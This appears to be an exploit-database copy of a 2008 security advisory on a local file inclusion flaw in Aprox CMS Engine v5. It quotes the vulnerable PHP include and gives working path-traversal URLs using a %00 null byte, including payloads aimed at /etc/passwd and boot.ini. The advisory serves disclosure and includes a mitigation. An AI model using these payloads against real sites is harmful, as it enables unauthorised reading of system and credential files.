APROX CMS ENGINE V5(.1.0.4) LOCAL FILE INCLUSION (LFI)

vendor:

Aprox CMS Engine

by:

SkyOut

8.5

CVSS

HIGH

Local File Inclusion (LFI)

CWE

Product Name: Aprox CMS Engine

Affected Version From: 5

Affected Version To: 5.1.0.4

Patch Exists: N/A

Related CWE: N/A

CPE: a:aprox_cms_engine:aprox_cms_engine:5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Vista Premium

2007

APROX CMS ENGINE V5(.1.0.4) LOCAL FILE INCLUSION (LFI)

The Aprox CMS Engine in version 5 (tested in 1.0.4) is vulnerable to an attack in the way of a Local File Inclusion (LFI). The exploitation has been tested on a local webserver, using Apache HTTPD 2.2.8 + MySQL 5.0.51a (XAMPP for Windows) on Windows Vista Premium. As seen in the index.php files source code, the script checks for the parameter 'id' to be set. However, the script makes sure 'page' parameter has been set and is unequal NULL. Then the script checks if the files does exist, using the extension *.inc. The script includes the file, which is specified in the 'page' parameter, allowing an attacker to include any file they want.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in a file operation.

Source

Exploit-DB raw data:

____________________________________________________________________________
____________________________________________________________________________

01010111 01001001 01010010 01000101 01000100  01010011 ->
01000101 01000011 01010101 01010010 01001001  01010100 ->
01011001                                                      

____________________________________________________________________________
ADVISORY: APROX CMS ENGINE V5(.1.0.4) LOCAL FILE INCLUSION (LFI)
____________________________________________________________________________

_____________________
|| 0x00: ABOUT ME
|| 0x01: DATELINE
|| 0x02: INFORMATION
|| 0x03: EXPLOITATION
|| 0x04: RISK LEVEL

____________________________________________________________
____________________________________________________________

_________________
|| 0x00: ABOUT ME

Author: SkyOut
Date: June 2008
Website: http://wired-security.net/

_________________
|| 0x01: DATELINE

2007-06-21: Bug found
2007-06-21: Advisory released

____________________
|| 0x02: INFORMATION


The Aprox CMS Engine in version 5 (tested in 1.0.4) is vulnerable to an attack
in the way of a Local File Inclusion (LFI).

The exploitation has been tested on a local webserver, using Apache HTTPD 2.2.8
+ MySQL 5.0.51a (XAMPP for Windows) on Windows Vista Premium.
-> http://www.apachefriends.org/en/xampp-windows.html

_____________________
|| 0x03: EXPLOITATION

Let's look at the index.php files source code:

--- SNIP ---
if (!isset($_GET["id"]))
{
if ((isset($_GET["page"])) && ($_GET["page"] != "")){
if (file_exists("./engine/inc/".$_GET["page"].".inc")){
--- SNIP ---

As you can see the script checks for the parameter "id" to be set. Interesting enough,
but later we won't care for this anymore... What is interesting then is line 3: The
script makes sure "page" parameter has been set and is unequal NULL. Then the script
checks if the files does exist, using the extension *.inc!

Now the interesting thing comes in:

--- SNIP ---
include("./engine/inc/".$_GET["page"].".inc");
--- SNIP ---

WHUPS! Here the script simply includes the file, that is given through the paramter "page"
via GET without any further security checks.

Now we can set the "page" parameter to whatever we want :)

Let's try (I did with the file "C:\xampp\xampp-changes.txt" because I don't have a "boot.ini",
you remember? -> Vista!):

=> http://.../index.php?page=../../../../../../../xampp/xampp-changes.txt

We get the following error: "Fehler - Datei nicht gefunden!", which means in english:
"Error - File not found!". No wonder, because we build up the following:

=> include("./engine/inc/../../../../../../../xampp/xampp-changes.txt.inc");

And this file really does not exist! So lets cut it off with some simple trick you should know
from other exploits (if you ever read some!): %00!

+-------------------------------------------------------------------------------+
|===============================================================================| 
|=> http://.../index.php?page=../../../../../../../xampp/xampp-changes.txt%00 <=|
|===============================================================================|
|                                                                               |
|And now we get the output of "C:\xampp\xampp-changes.txt":                     |
|                                                                               |
|--- OUTPUT ---                                                                 |
|14. Feb 2008 XAMPP 1.6.6a - Upgrade to MySQL 5.0.51a - PHP 4.4.8 (Release) ... |
|--- OUTPUT ---                                                                 |
|                                                                               |
|Now it depends on the system, what you can include:                            |
|                                                                               |
|../etc/passwd%00                                                               |
|../boot.ini%00                                                                 |
|or others...                                                                   |
+-------------------------------------------------------------------------------+

___________________
|| 0x04: RISK LEVEL

- MEDIUM - (2/3) -

<!> Happy Hacking <!>

____________________________________________________________________________
____________________________________________________________________________

EOF

# milw0rm.com [2008-06-21]